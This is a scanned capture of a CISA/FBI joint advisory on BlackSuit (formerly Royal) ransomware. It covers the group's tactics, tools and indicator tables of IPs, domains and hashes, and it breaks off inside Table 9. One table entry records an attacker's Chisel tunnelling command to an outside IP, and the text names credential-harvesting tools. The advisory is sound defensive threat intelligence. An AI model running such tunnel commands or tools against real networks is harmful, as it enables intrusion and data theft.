www.cisa.gov
Open in
urlscan Pro
2a02:26f0:3500:88d::447a
Public Scan
URL:
https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-061a
Submission: On August 09 via api from IT — Scanned from IT
Submission: On August 09 via api from IT — Scanned from IT
Form analysis 2 forms found in the DOM
<form class="gsc-search-box gsc-search-box-tools" accept-charset="utf-8">
<table cellspacing="0" cellpadding="0" role="presentation" class="gsc-search-box">
<tbody>
<tr>
<td class="gsc-input">
<div class="gsc-input-box" id="gsc-iw-id1">
<table cellspacing="0" cellpadding="0" role="presentation" id="gs_id50" class="gstl_50 gsc-input" style="width: 100%; padding: 0px;">
<tbody>
<tr>
<td id="gs_tti50" class="gsib_a"><input autocomplete="off" type="text" size="10" class="gsc-input" name="search" title="search" aria-label="search" id="gsc-i-id1" dir="ltr" spellcheck="false"
style="width: 100%; padding: 0px; border: none; margin: 0px; height: auto; outline: none;"></td>
<td class="gsib_b">
<div class="gsst_b" id="gs_st50" dir="ltr"><a class="gsst_a" href="javascript:void(0)" title="Clear search box" role="button" style="display: none;"><span class="gscb_a" id="gs_cb50" aria-hidden="true">×</span></a></div>
</td>
</tr>
</tbody>
</table>
</div>
</td>
<td class="gsc-search-button"><button class="gsc-search-button gsc-search-button-v2"><svg width="13" height="13" viewBox="0 0 13 13">
<title>search</title>
<path
d="m4.8495 7.8226c0.82666 0 1.5262-0.29146 2.0985-0.87438 0.57232-0.58292 0.86378-1.2877 0.87438-2.1144 0.010599-0.82666-0.28086-1.5262-0.87438-2.0985-0.59352-0.57232-1.293-0.86378-2.0985-0.87438-0.8055-0.010599-1.5103 0.28086-2.1144 0.87438-0.60414 0.59352-0.8956 1.293-0.87438 2.0985 0.021197 0.8055 0.31266 1.5103 0.87438 2.1144 0.56172 0.60414 1.2665 0.8956 2.1144 0.87438zm4.4695 0.2115 3.681 3.6819-1.259 1.284-3.6817-3.7 0.0019784-0.69479-0.090043-0.098846c-0.87973 0.76087-1.92 1.1413-3.1207 1.1413-1.3553 0-2.5025-0.46363-3.4417-1.3909s-1.4088-2.0686-1.4088-3.4239c0-1.3553 0.4696-2.4966 1.4088-3.4239 0.9392-0.92727 2.0864-1.3969 3.4417-1.4088 1.3553-0.011889 2.4906 0.45771 3.406 1.4088 0.9154 0.95107 1.379 2.0924 1.3909 3.4239 0 1.2126-0.38043 2.2588-1.1413 3.1385l0.098834 0.090049z">
</path>
</svg></button></td>
<td class="gsc-clear-button">
<div class="gsc-clear-button" title="clear results"> </div>
</td>
</tr>
</tbody>
</table>
</form><form class="gsc-search-box gsc-search-box-tools" accept-charset="utf-8">
<table cellspacing="0" cellpadding="0" role="presentation" class="gsc-search-box">
<tbody>
<tr>
<td class="gsc-input">
<div class="gsc-input-box" id="gsc-iw-id2">
<table cellspacing="0" cellpadding="0" role="presentation" id="gs_id51" class="gstl_51 gsc-input" style="width: 100%; padding: 0px;">
<tbody>
<tr>
<td id="gs_tti51" class="gsib_a"><input autocomplete="off" type="text" size="10" class="gsc-input" name="search" title="search" aria-label="search" id="gsc-i-id2" dir="ltr" spellcheck="false"
style="width: 100%; padding: 0px; border: none; margin: 0px; height: auto; outline: none;"></td>
<td class="gsib_b">
<div class="gsst_b" id="gs_st51" dir="ltr"><a class="gsst_a" href="javascript:void(0)" title="Clear search box" role="button" style="display: none;"><span class="gscb_a" id="gs_cb51" aria-hidden="true">×</span></a></div>
</td>
</tr>
</tbody>
</table>
</div>
</td>
<td class="gsc-search-button"><button class="gsc-search-button gsc-search-button-v2"><svg width="13" height="13" viewBox="0 0 13 13">
<title>search</title>
<path
d="m4.8495 7.8226c0.82666 0 1.5262-0.29146 2.0985-0.87438 0.57232-0.58292 0.86378-1.2877 0.87438-2.1144 0.010599-0.82666-0.28086-1.5262-0.87438-2.0985-0.59352-0.57232-1.293-0.86378-2.0985-0.87438-0.8055-0.010599-1.5103 0.28086-2.1144 0.87438-0.60414 0.59352-0.8956 1.293-0.87438 2.0985 0.021197 0.8055 0.31266 1.5103 0.87438 2.1144 0.56172 0.60414 1.2665 0.8956 2.1144 0.87438zm4.4695 0.2115 3.681 3.6819-1.259 1.284-3.6817-3.7 0.0019784-0.69479-0.090043-0.098846c-0.87973 0.76087-1.92 1.1413-3.1207 1.1413-1.3553 0-2.5025-0.46363-3.4417-1.3909s-1.4088-2.0686-1.4088-3.4239c0-1.3553 0.4696-2.4966 1.4088-3.4239 0.9392-0.92727 2.0864-1.3969 3.4417-1.4088 1.3553-0.011889 2.4906 0.45771 3.406 1.4088 0.9154 0.95107 1.379 2.0924 1.3909 3.4239 0 1.2126-0.38043 2.2588-1.1413 3.1385l0.098834 0.090049z">
</path>
</svg></button></td>
<td class="gsc-clear-button">
<div class="gsc-clear-button" title="clear results"> </div>
</td>
</tr>
</tbody>
</table>
</form>Text Content
Skip to main content
An official website of the United States government
Here’s how you know
Here’s how you know
Official websites use .gov
A .gov website belongs to an official government organization in the United
States.
Secure .gov websites use HTTPS
A lock (LockA locked padlock) or https:// means you’ve safely connected to the
.gov website. Share sensitive information only on official, secure websites.
Free Cyber Services#protect2024Secure Our WorldShields UpReport A Cyber Issue
Search
×
search
Menu
Close
×
search
* Topics
Topics
Cybersecurity Best Practices
Cyber Threats and Advisories
Critical Infrastructure Security and Resilience
Election Security
Emergency Communications
Industrial Control Systems
Information and Communications Technology Supply Chain Security
Partnerships and Collaboration
Physical Security
Risk Management
How can we help?
GovernmentEducational InstitutionsIndustryState, Local, Tribal, and
TerritorialIndividuals and FamiliesSmall and Medium BusinessesFind Help
LocallyFaith-Based CommunityExecutivesHigh-Risk Communities
* Spotlight
* Resources & Tools
Resources & Tools
All Resources & Tools
Services
Programs
Resources
Training
Groups
* News & Events
News & Events
News
Events
Cybersecurity Alerts & Advisories
Directives
Request a CISA Speaker
Congressional Testimony
CISA Conferences
CISA Live!
* Careers
Careers
Benefits & Perks
HireVue Applicant Reasonable Accommodations Process
Hiring
Resume & Application Tips
Students & Recent Graduates
Veteran and Military Spouses
Work @ CISA
* About
About
Culture
Divisions & Offices
Regions
Leadership
Doing Business with CISA
Site Links
Reporting Employee and Contractor Misconduct
CISA GitHub
CISA Central
2023 Year In Review
Contact Us
Free Cyber Services#protect2024Secure Our WorldShields UpReport A Cyber Issue
Breadcrumb
1. Home
2. News & Events
3. Cybersecurity Advisories
4. Cybersecurity Advisory
Share:
Cybersecurity Advisory
#STOPRANSOMWARE: BLACKSUIT (ROYAL) RANSOMWARE
Last Revised
August 07, 2024
Alert Code
AA23-061A
Related topics:
Cyber Threats and Advisories, Incident Detection, Response, and Prevention,
Malware, Phishing, and Ransomware
ACTIONS FOR ORGANIZATIONS TO TAKE TODAY TO MITIGATE CYBER THREATS RELATED TO
BLACKSUIT RANSOMWARE ACTIVITY
1. Prioritize remediating known exploited vulnerabilities.
2. Train users to recognize and report phishing attempts.
3. Enable and enforce multifactor authentication.
SUMMARY
Note: This joint Cybersecurity Advisory is part of an ongoing #StopRansomware
effort to publish advisories for network defenders that detail various
ransomware variants and ransomware threat actors. These #StopRansomware
advisories include recently and historically observed tactics, techniques, and
procedures (TTPs) and indicators of compromise (IOCs) to help organizations
protect against ransomware. Visit stopransomware.gov to see all
#StopRansomware advisories and to learn more about other ransomware threats and
no-cost resources.
Note: This advisory, originally published March 2, 2023, has been updated twice:
* November 13, 2023: The advisory was updated to share new Royal TTPs and IOCs.
* August 7, 2024: The advisory was updated to notify network defenders of the
rebrand of “Royal” ransomware actors to “BlackSuit.” The update includes new
TTPs, IOCs, and detection methods related to BlackSuit ransomware. “Royal”
was updated to “BlackSuit” throughout unless referring to legacy Royal
activity. Updates and new content are noted.
(New August 7, 2024) The Federal Bureau of Investigation (FBI) and the
Cybersecurity and Infrastructure Security Agency (CISA) are releasing this joint
advisory to disseminate known BlackSuit ransomware IOCs and TTPs identified
through FBI threat response activities and third-party reporting as recently as
of July 2024. BlackSuit ransomware is the evolution of the ransomware previously
identified as Royal ransomware, which was used from approximately September 2022
through June 2023. BlackSuit shares numerous coding similarities with Royal
ransomware and has exhibited improved capabilities.
(Updated August 7, 2024) BlackSuit conducts data exfiltration and extortion
prior to encryption and then publishes victim data to a leak site if a ransom is
not paid. Phishing emails are among the most successful vectors for initial
access by BlackSuit threat actors. After gaining access to victims’ networks,
BlackSuit actors disable antivirus software and exfiltrate large amounts of data
before ultimately deploying the ransomware and encrypting the systems.
(Updated August 7, 2024) Ransom demands have typically ranged from approximately
$1 million to $10 million USD, with payment demanded in Bitcoin. BlackSuit
actors have demanded over $500 million USD in total and the largest individual
ransom demand was $60 million. BlackSuit actors have exhibited a willingness to
negotiate payment amounts. Ransom amounts are not part of the initial ransom
note, but require direct interaction with the threat actor via a .onion URL
(reachable through the Tor browser) provided after encryption. Recently, an
uptick was observed in the number of instances where victims received telephonic
or email communications from BlackSuit actors regarding the compromise and
ransom. BlackSuit uses a leak site to publish victim data based on non-payment.
FBI and CISA encourage organizations to implement the recommendations found in
the Mitigations section of this CSA to reduce the likelihood and impact of
ransomware incidents.
Download the PDF version of this report:
AA23-061A #StopRansomware BlackSuit (Royal) Ransomware (PDF, 657.64 KB )
For a downloadable copy of IOCs, see:
AA23-061A STIX XML (MAR 2023) (XML, 114.26 KB )
AA23-061A STIX XML (NOV 2023 Update) (XML, 152.94 KB )
AA23-061A STIX JSON (NOV 2023 Update) (JSON, 113.96 KB )
AA23-061A STIX XML (BlackSuit) (XML, 247.66 KB )
AA23-061A STIX JSON (BlackSuit) (JSON, 167.21 KB )
TECHNICAL DETAILS
Note: This advisory uses the MITRE ATT&CK®(link is external) for Enterprise(link
is external) framework, version 15. See the MITRE ATT&CK Tactics and Techniques
section for a table of the threat actors’ activity mapped to MITRE ATT&CK
tactics and techniques. For assistance with mapping malicious cyber activity to
the MITRE ATT&CK framework, see CISA and MITRE ATT&CK’s Best Practices for MITRE
ATT&CK Mapping and CISA’s Decider Tool(link is external).
INITIAL ACCESS
BlackSuit uses a unique partial encryption approach that allows the threat actor
to choose a specific percentage of data in a file to encrypt. This approach
allows the actor to lower the encryption percentage for larger files, which
helps evade detection, and also significantly improves ransomware speed.[1(link
is external)] In addition to encrypting files, BlackSuit actors also engage in
double extortion tactics in which they threaten to publicly release the
exfiltrated data if the victim does not pay the ransom.
BlackSuit actors gain initial access to victim networks in several ways,
including:
* Phishing. According to third-party reporting, BlackSuit actors most commonly
gain initial access to victim networks via phishing emails [T1566(link is
external)].
* According to open source reporting, victims have unknowingly installed
malware that delivers BlackSuit ransomware after receiving phishing emails
containing malicious PDF documents [T1566.001(link is external)] and
malvertising [T1566.002(link is external)].[2(link is external)]
* Remote Desktop Protocol (RDP). The second most common vector (around 13.3% of
incidents) BlackSuit actors use for initial access is RDP compromise
[T1021.001(link is external)].
* Public-facing applications. FBI has observed BlackSuit actors gain initial
access through exploiting vulnerable public-facing applications [T1190(link
is external)].
* Brokers. Reports from trusted third-party sources indicate that BlackSuit
actors may leverage initial access brokers to gain initial access and source
traffic by harvesting virtual private network (VPN) credentials from stealer
logs [T1650(link is external)].
COMMAND AND CONTROL
Once BlackSuit actors gain access to a network, they communicate with command
and control (C2) infrastructure and download multiple tools [T1105(link is
external)]. Legitimate Windows software is repurposed by BlackSuit actors to
strengthen their foothold within the victim’s network. Ransomware operators
often use open source projects to aid their intrusion activities.
Historically, Royal actors were observed leveraging Chisel, Secure Shell
(SSH) client, PuTTY, OpenSSH, and MobaXterm [T1572(link is external)], to
communicate with their C2 infrastructure.
LATERAL MOVEMENT AND PERSISTENCE
(Updated August 7, 2024) Historically, Royal threat actors used RDP and
legitimate operating system (OS) diagnostic tools to move laterally across a
network [T1021.001(link is external)]. BlackSuit actors used RDP and PsExec as
well but also use SMB [T1021.001(link is external)] to move laterally. In one
confirmed case, BlackSuit actors used a legitimate admin account [T1078(link is
external)] to remotely log on to the domain controller via SMB. Once on the
domain controller, the threat actor deactivated antivirus software
[T1562.001(link is external)] by modifying Group Policy Objects [T1484.001(link
is external)].
(Updated August 7, 2024) FBI observed BlackSuit actors using legitimate remote
monitoring and management (RMM) software to maintain persistence in victim
networks [T1133](link is external).
(New August 7, 2024) BlackSuit actors use SystemBC and Gootloader malware to
load additional tools and maintain persistence.
DISCOVERY AND CREDENTIAL ACCESS
(New August 7, 2024) BlackSuit actors have been observed using SharpShares and
SoftPerfect NetWorx to enumerate victim networks. The publicly available
credential stealing tool Mimikatz and password harvesting tools from Nirsoft
have also been found on victim systems. Tools such as PowerTool and GMER are
often used to kill system processes.
EXFILTRATION
BlackSuit actors exfiltrate data from victim networks by repurposing legitimate
cyber penetration testing tools, such as Cobalt Strike(link is external), and
malware tools/derivatives, such as Ursnif(link is external)/Gozi, for data
aggregation and exfiltration. According to third-party reporting, BlackSuit
actors’ first hop in exfiltration and other operations is usually a U.S. IP
address.
(New August 7, 2024) BlackSuit actors also use RClone and Brute Ratel for
exfiltration.
ENCRYPTION
Before starting the encryption process, BlackSuit actors:
* Use Windows Restart Manager to determine whether targeted files are currently
in use or blocked by other applications [T1486(link is external)].[1(link is
external)]
* Use Windows Volume Shadow Copy service (vssadmin.exe) to delete shadow copies
to inhibit system recovery.[1(link is external)]
FBI has found numerous batch (.bat) files on impacted systems which are
typically transferred as an encrypted 7zip file. Batch files create a new admin
user [T1078.002(link is external)], force a group policy update, set pertinent
registry keys to auto-extract [T1119(link is external)] and execute the
ransomware, monitor the encryption process, and delete files upon
completion—including Application, System, and Security event logs
[T1070.001(link is external)]. Registry Keys created can be modified and deleted
to enable persistence on the victim’s system.
Malicious files have been found in victim networks in the following directories:
* C:\Temp\
* C:\Users\<user>\AppData\Roaming\
* C:\Users\<users>\
* C:\ProgramData\
Root C:\ directory has also served as a storage location for malicious files.
BlackSuit actors have been observed using legitimate software and open source
tools during ransomware operations.
INDICATORS OF COMPROMISE (IOCS)
See Table 1 through Table 5 for Royal ransomware IOCs obtained by FBI during
threat response activities as of January 2023.
(New November 13, 2023) See Table 6 and Table 7 for Royal and BlackSuit
Ransomware IOCs as of June 2023. See Table 8 for a list of legitimate software
used by Royal and BlackSuit threat actors identified through FBI investigations
as of June 2023.
(New August 7, 2024) See Table 9 through Table 15 for BlackSuit ransomware IOCs
obtained by FBI during threat response activities as of July 2024 and Figure 1
for a sample ransom note.
Disclaimer: Some of the observed IP addresses are several years old. FBI and
CISA recommend vetting or investigating these IP addresses prior to taking
forward-looking action, such as blocking.
ROYAL IOCS AS OF JANUARY 2023
Table 1: Royal Ransomware Associated Files as of January 2023 IOC Description
IOC .royal Description Encrypted file extension IOC README.TXT Description
Ransom note
Table 2: Royal Ransomware Associated IP addresses as of January 2023 Malicious
IP Last Observed Activity Malicious IP 102.157.44[.]105 Last Observed Activity
November 2022 Malicious IP 105.158.118[.]241 Last Observed Activity November
2022 Malicious IP 105.69.155[.]85 Last Observed Activity November 2022 Malicious
IP 113.169.187[.]159 Last Observed Activity November 2022 Malicious IP
134.35.9[.]209 Last Observed Activity November 2022 Malicious IP
139.195.43[.]166 Last Observed Activity November 2022 Malicious IP
139.60.161[.]213 Last Observed Activity November 2022 Malicious IP
148.213.109[.]165 Last Observed Activity November 2022 Malicious IP
163.182.177[.]80 Last Observed Activity November 2022 Malicious IP
181.141.3[.]126 Last Observed Activity November 2022 Malicious IP
181.164.194[.]228 Last Observed Activity November 2022 Malicious IP
185.143.223[.]69 Last Observed Activity November 2022 Malicious IP 186.64.67[.]6
Last Observed Activity November 2022 Malicious IP 186.86.212[.]138 Last Observed
Activity November 2022 Malicious IP 190.193.180[.]228 Last Observed Activity
November 2022 Malicious IP 196.70.77[.]11 Last Observed Activity November 2022
Malicious IP 197.11.134[.]255 Last Observed Activity November 2022 Malicious IP
197.158.89[.]85 Last Observed Activity November 2022 Malicious IP
197.204.247[.]7 Last Observed Activity November 2022 Malicious IP
197.207.181[.]147 Last Observed Activity November 2022 Malicious IP
197.207.218[.]27 Last Observed Activity November 2022 Malicious IP
197.94.67[.]207 Last Observed Activity November 2022 Malicious IP
23.111.114[.]52 Last Observed Activity November 2022 Malicious IP 41.100.55[.]97
Last Observed Activity November 2022 Malicious IP 41.107.77[.]67 Last Observed
Activity November 2022 Malicious IP 41.109.11[.]80 Last Observed Activity
November 2022 Malicious IP 41.251.121[.]35 Last Observed Activity November 2022
Malicious IP 41.97.65[.]51 Last Observed Activity November 2022 Malicious IP
42.189.12[.]36 Last Observed Activity November 2022 Malicious IP
45.227.251[.]167 Last Observed Activity November 2022 Malicious IP 5.44.42[.]20
Last Observed Activity November 2022 Malicious IP 61.166.221[.]46 Last Observed
Activity November 2022 Malicious IP 68.83.169[.]91 Last Observed Activity
November 2022 Malicious IP 81.184.181[.]215 Last Observed Activity November 2022
Malicious IP 82.12.196[.]197 Last Observed Activity November 2022 Malicious IP
98.143.70[.]147 Last Observed Activity November 2022 Malicious IP
140.82.48[.]158 Last Observed Activity December 2022 Malicious IP
147.135.36[.]162 Last Observed Activity December 2022 Malicious IP
147.135.11[.]223 Last Observed Activity December 2022 Malicious IP
152.89.247[.]50 Last Observed Activity December 2022 Malicious IP 172.64.80[.]1
Last Observed Activity December 2022 Malicious IP 179.43.167[.]10 Last Observed
Activity December 2022 Malicious IP 185.7.214[.]218 Last Observed Activity
December 2022 Malicious IP 193.149.176[.]157 Last Observed Activity December
2022 Malicious IP 193.235.146[.]104 Last Observed Activity December 2022
Malicious IP 209.141.36[.]116 Last Observed Activity December 2022 Malicious IP
45.61.136[.]47 Last Observed Activity December 2022 Malicious IP 45.8.158[.]104
Last Observed Activity December 2022 Malicious IP 5.181.234[.]58 Last Observed
Activity December 2022 Malicious IP 5.188.86[.]195 Last Observed Activity
December 2022 Malicious IP 77.73.133[.]84 Last Observed Activity December 2022
Malicious IP 89.108.65[.]136 Last Observed Activity December 2022 Malicious IP
94.232.41[.]105 Last Observed Activity December 2022 Malicious IP 47.87.229[.]39
Last Observed Activity January 2023
Table 3: Royal Ransomware Associated Domains as of January 2023 Malicious Domain
Last Observed Activity Malicious Domain sombrat[.]com Last Observed Activity
October 2022 Malicious Domain gororama[.]com Last Observed Activity November
2022 Malicious Domain softeruplive[.]com Last Observed Activity November 2022
Malicious Domain altocloudzone[.]live Last Observed Activity December 2022
Malicious Domain ciborkumari[.]xyz Last Observed Activity December 2022
Malicious Domain myappearinc[.]com Last Observed Activity December 2022
Malicious Domain parkerpublic[.]com Last Observed Activity December 2022
Malicious Domain pastebin.mozilla[.]org/Z54Vudf9/raw Last Observed Activity
December 2022 Malicious Domain tumbleproperty[.]com Last Observed Activity
December 2022 Malicious Domain myappearinc[.]com/acquire/draft/c7lh0s5jv Last
Observed Activity January 2023
Table 4: Tools Used by Royal Operators Tool SHA256 Tool AV tamper SHA256
8A983042278BC5897DBCDD54D1D7E3143F8B7EAD553B5A4713E30DEFFDA16375 Tool TCP/UDP
Tunnel over HTTP (Chisel) SHA256
8a99353662ccae117d2bb22efd8c43d7169060450be413af763e8ad7522d2451 Tool
Ursnif/Gozi SHA256
be030e685536eb38ba1fec1c90e90a4165f6641c8dc39291db1d23f4ee9fa0b1 Tool Exfil
SHA256 B8C4AEC31C134ADBDBE8AAD65D2BCB21CFE62D299696A23ADD9AA1DE082C6E20 Tool
Remote Access (AnyDesk) SHA256
4a9dde3979c2343c024c6eeeddff7639be301826dd637c006074e04a1e4e9fe7 Tool PowerShell
Toolkit Downloader SHA256
4cd00234b18e04dcd745cc81bb928c8451f6601affb5fa45f20bb11bfb5383ce Tool PsExec
(Microsoft Sysinternals) SHA256
08c6e20b1785d4ec4e3f9956931d992377963580b4b2c6579fd9930e08882b1c Tool Keep Host
Unlocked (Don’t Sleep) SHA256
f8cff7082a936912baf2124d42ed82403c75c87cb160553a7df862f8d81809ee Tool Ransomware
Executable SHA256
d47d4b52e75e8cf3b11ea171163a66c06d1792227c1cf7ca49d7df60804a1681 Tool Windows
Command Line (NirCmd) SHA256
216047C048BF1DCBF031CF24BD5E0F263994A5DF60B23089E393033D17257CB5 Tool System
Management (NSudo) SHA256
19896A23D7B054625C2F6B1EE1551A0DA68AD25CDDBB24510A3B74578418E618 Tool AV tamper
SHA256 8A983042278BC5897DBCDD54D1D7E3143F8B7EAD553B5A4713E30DEFFDA16375 Tool
TCP/UDP Tunnel over HTTP (Chisel) SHA256
8a99353662ccae117d2bb22efd8c43d7169060450be413af763e8ad7522d2451 Tool
Ursnif/Gozi SHA256
be030e685536eb38ba1fec1c90e90a4165f6641c8dc39291db1d23f4ee9fa0b1 Tool Exfil
SHA256 B8C4AEC31C134ADBDBE8AAD65D2BCB21CFE62D299696A23ADD9AA1DE082C6E20 Tool
Remote Access (AnyDesk) SHA256
4a9dde3979c2343c024c6eeeddff7639be301826dd637c006074e04a1e4e9fe7 Tool PowerShell
Toolkit Downloader SHA256
4cd00234b18e04dcd745cc81bb928c8451f6601affb5fa45f20bb11bfb5383ce Tool PsExec
(Microsoft Sysinternals) SHA256
08c6e20b1785d4ec4e3f9956931d992377963580b4b2c6579fd9930e08882b1c Tool Keep Host
Unlocked (Don’t Sleep) SHA256
f8cff7082a936912baf2124d42ed82403c75c87cb160553a7df862f8d81809ee Tool Ransomware
Executable SHA256
d47d4b52e75e8cf3b11ea171163a66c06d1792227c1cf7ca49d7df60804a1681 Tool Windows
Command Line (NirCmd) SHA256
216047C048BF1DCBF031CF24BD5E0F263994A5DF60B23089E393033D17257CB5 Tool System
Management (NSudo) SHA256
19896A23D7B054625C2F6B1EE1551A0DA68AD25CDDBB24510A3B74578418E618
Table 5: Batch Script Tools Used by Royal Operators File name Hash Value File
name 2.bat Hash Value 585b05b290d241a249af93b1896a9474128da969 File name 3.bat
Hash Value 41a79f83f8b00ac7a9dd06e1e225d64d95d29b1d File name 4.bat Hash Value
a84ed0f3c46b01d66510ccc9b1fc1e07af005c60 File name 8.bat Hash Value
c96154690f60a8e1f2271242e458029014ffe30a File name kl.bat Hash Value
65dc04f3f75deb3b287cca3138d9d0ec36b8bea0 File name gp.bat Hash Value
82f1f72f4b1bfd7cc8afbe6d170686b1066049bc7e5863b51aa15ccc5c841f58 File name r.bat
Hash Value 74d81ef0be02899a177d7ff6374d699b634c70275b3292dbc67e577b5f6a3f3c File
name runanddelete.bat Hash Value
342B398647073159DFA8A7D36510171F731B760089A546E96FBB8A292791EFEE
ROYAL AND BLACKSUIT IOCS AS OF JUNE 2023 (NEW NOVEMBER 13, 2023)
Table 6: Royal Ransomware Associated Files, Tools, and Hashes as of June 2023
Name Description or SHA 256 Hash Value Name C:\Users\Public\conhost.exe client
149.28.73.161:443 R:149.28.73.161:43657:socks Description or SHA 256 Hash Value
Executed on the victim’s machine, uses a Chisel client to tunnel traffic through
port 443 instead of port 43657. Name royal_w Description or SHA 256 Hash Value
Encryption extension Name %PROGRAMDATA% Description or SHA 256 Hash Value
Ransomware Filepath Name %TEMP%\execute.bat Description or SHA 256 Hash Value
Name InstallerV20.8.msi Description or SHA 256 Hash Value Name
windows_encryptor.exe Description or SHA 256 Hash Value
85087f28a84205e344d7e8e06979e6622fab0cfe1759fd24e38cd0390bca5fa6 Name
%PROGRAMDATA%\wine.exe Description or SHA 256 Hash Value
5b08c02c141eab94a40b56240a26cab7ff07e9a6e760dfde8b8b053a3526f0e6 Name
%USERPROFILE%\Downloads\run1.bat Description or SHA 256 Hash Value
bc609cf53dde126b766d35b5bcf0a530c24d91fe23633dad6c2c59fd1843f781 Name
%USERPROFILE%\Downloads\run2.bat Description or SHA 256 Hash Value
13c25164791d3436cf2efbc410caec6b6dd6978d7e83c4766917630e24e1af10 Name
%USERPROFILE%\Downloads\run3.bat Description or SHA 256 Hash Value
2b93206d7a36cccdf7d7596b90ead301b2ff7e9a96359f39b6ba31bb13d11f45 Name
%USERPROFILE%\Downloads\run4.bat Description or SHA 256 Hash Value
84e1efbed6bb7720caea6720a8bff7cd93b5d42fb1d71ef8031bfd3897ed4435 Name
%USERPROFILE%\Downloads\sc.bat Description or SHA 256 Hash Value
e0dbe3a2d07ee10731b68a142c65db077cfb88e5ec5c8415e548d3ede40e7ffc Name
%USERPROFILE%\Downloads\sr.bat Description or SHA 256 Hash Value
34a98f2b54ebab999f218b0990665485eb2bb74babdf7e714cc10a306616b00c Name
runanddelete.bat Description or SHA 256 Hash Value
342b398647073159dfa8a7d36510171f731b760089a546e96fbb8a292791efee Name
scripttodo.ps1 (94.232.41.105) Description or SHA 256 Hash Value
4cd00234b18e04dcd745cc81bb928c8451f6601affb5fa45f20bb11bfb5383ce Name
dontsleep.exe Description or SHA 256 Hash Value
f8cff7082a936912baf2124d42ed82403c75c87cb160553a7df862f8d81809ee Name wstart.exe
Description or SHA 256 Hash Value
d47d4b52e75e8cf3b11ea171163a66c06d1792227c1cf7ca49d7df60804a1681 Name
InstallerV8.1.ms Description or SHA 256 Hash Value
3e6e2e0de75896033d91dfd07550c478590ca4cd4598004d9e19246e8a09cb97 Name
shutdowni.bat Description or SHA 256 Hash Value
8a983042278bc5897dbcdd54d1d7e3143f8b7ead553b5a4713e30deffda16375 Name f827.exe
Description or SHA 256 Hash Value
5654f32a4f0f2e900a35761e8caf7ef0c50ee7800e0a3b19354b571bc6876f61 Name d2ef5.exe
Description or SHA 256 Hash Value
be030e685536eb38ba1fec1c90e90a4165f6641c8dc39291db1d23f4ee9fa0b1 Name
f24dc8ea.msi Description or SHA 256 Hash Value
91605641a4c7e859b7071a9841d1cd154b9027e6a58c20ec4cadafeaf47c9055 Name defw10.bat
Description or SHA 256 Hash Value
fb638dba20e5fec72f5501d7e0627b302834ec5eaf331dd999763ee925cbc0f9 Name ll.exe
Description or SHA 256 Hash Value
f0197bd7ccd568c523df9c7d9afcbac222f14d344312322c04c92e7968859726 Name Royal
Ransomware Hash Description or SHA 256 Hash Value
b987f738a1e185f71e358b02cafa5fe56a4e3457df3b587d6b40e9c9de1da410 Name b34v2.dll
Description or SHA 256 Hash Value a51b1f1f0636bff199c0f87e2bb300d42e06698b Name
1.exe Description or SHA 256 Hash Value d93f1ef533e6b8c95330ba0962e3670eaf94a026
Name 34.dll Description or SHA 256 Hash Value
9e19afc15c5781e8a89a75607578760aabad8e65 Name ll.exe Description or SHA 256 Hash
Value 9a92b147cad814bfbd4632b6034b8abf8d84b1a5 Name Royal Ransomware Hash
Description or SHA 256 Hash Value a4ef01d55e55cebdd37ba71c28b0c448a9c833c0
Table 7: BlackSuit Ransomware Associated Files, Tools, and Hashes as of June
2023 IP Address MD5 Hash Value IP Address sys32.exe MD5 Hash Value
30cc7724be4a09d5bcd9254197af05e9fab76455 IP Address esxi_encryptor MD5 Hash
Value 861793c4e0d4a92844994b640cc6bc3e20944a73
BlackSuit threat actors have been observed using legitimate software and open
source tools during ransomware operations. Threat actors have been observed
using open source network tunneling tools such as Chisel and Cloudflared, as
well as Secure Shell (SSH) Client, OpenSSH, and MobaXterm to establish SSH
connections. The publicly available credential stealing tool Mimikatz and
password harvesting tools from Nirsoft have also been found on victim systems.
Legitimate RMM tools have also been observed as backdoor access vectors. Some
legitimate software and open source tools can be found in Table 8.
Table 8: Legitimate Files and Tools Used by Royal and BlackSuit Ransomware Name
Description or SHA 256 Hash Value Name
C:\Program Files\OpenSSH\ssh-agent.exe
C:\Program Files\OpenSSH\sshd.exe
Description or SHA 256 Hash Value SSH Client Name
%USERPROFILE%\Downloads\WinRAR.exe Description or SHA 256 Hash Value Compression
tool Name %APPDATA%\MobaXterm\ Description or SHA 256 Hash Value Toolbox for
remote computing Name \Program Files (x86)\Mobatek\ Description or SHA 256 Hash
Value Toolbox for remote computing Name \Program Files (x86)\Mobatek\MobaXterm\
Description or SHA 256 Hash Value Toolbox for remote computing Name b34v2.dll
Description or SHA 256 Hash Value ColbaltStrike Beacon Name 34.dll Description
or SHA 256 Hash Value CobaltStrike Beacon Name mimikatz.exe Description or SHA
256 Hash Value Mimikatz credential harvester Name dialuppass.exe Description or
SHA 256 Hash Value Nirsoft password harvesting utility Name iepv.exe Description
or SHA 256 Hash Value Nirsoft password harvesting utility Name mailpv.exe
Description or SHA 256 Hash Value Nirsoft password harvesting utility Name
netpass.exe Description or SHA 256 Hash Value Nirsoft password harvesting
utility Name routerpassview.exe Description or SHA 256 Hash Value Nirsoft
password harvesting utility Name AdFind.exe Description or SHA 256 Hash Value
ADFind tool Name LogMeIn Description or SHA 256 Hash Value Remote access tool
Name Atera Description or SHA 256 Hash Value Remote access tool Name C:\Program
Files\Eraser\Eraser.exe Description or SHA 256 Hash Value Anti-Forensics Tool
used by TA Name advanced_ip_scanner.exe Description or SHA 256 Hash Value
Reconnaissance Tool used by TA Name conhost.exe (chisel_windows_1_7_7.exe)
Description or SHA 256 Hash Value
b9ef2e948a9b49a6930fc190b22cbdb3571579d37a4de56564e41a2ef736767b Name
%USERPROFILE%\Downloads\svvhost.exe
\Users\Administrator\AppData\Local\Temp\cloudflared.exe Description or SHA 256
Hash Value c429719a45ca14f52513fe55320ebc49433c729a0d2223479d9d43597eab39fa Name
nircmd.exe Description or SHA 256 Hash Value
216047c048bf1dcbf031cf24bd5e0f263994a5df60b23089e393033d17257cb5 Name nsudo.exe
Description or SHA 256 Hash Value
19896a23d7b054625c2f6b1ee1551a0da68ad25cddbb24510a3b74578418e618
IOCS AS OF JULY 2024 (NEW AUGUST 7, 2024)
Disclaimer: Several of these observed IP addresses were first observed as early
as 2023, although the most recent are from July of 2024 and have been
historically linked to BlackSuit (formerly known as Royal) Ransomware. IP
addresses in this advisory were maliciously used during the time range
highlighted below, and may have been used for legitimate purposes outside of
that time span. FBI and CISA recommend these IP addresses be investigated or
vetted by organizations prior to taking action, such as blocking.
Table 9: Malicious URL (s) associated with BlackSuit Ransomware URL Association
Malicious URLs URL Association URLs from malicious PowerShell on P0, potentially
debug.ps1 Malicious URLs
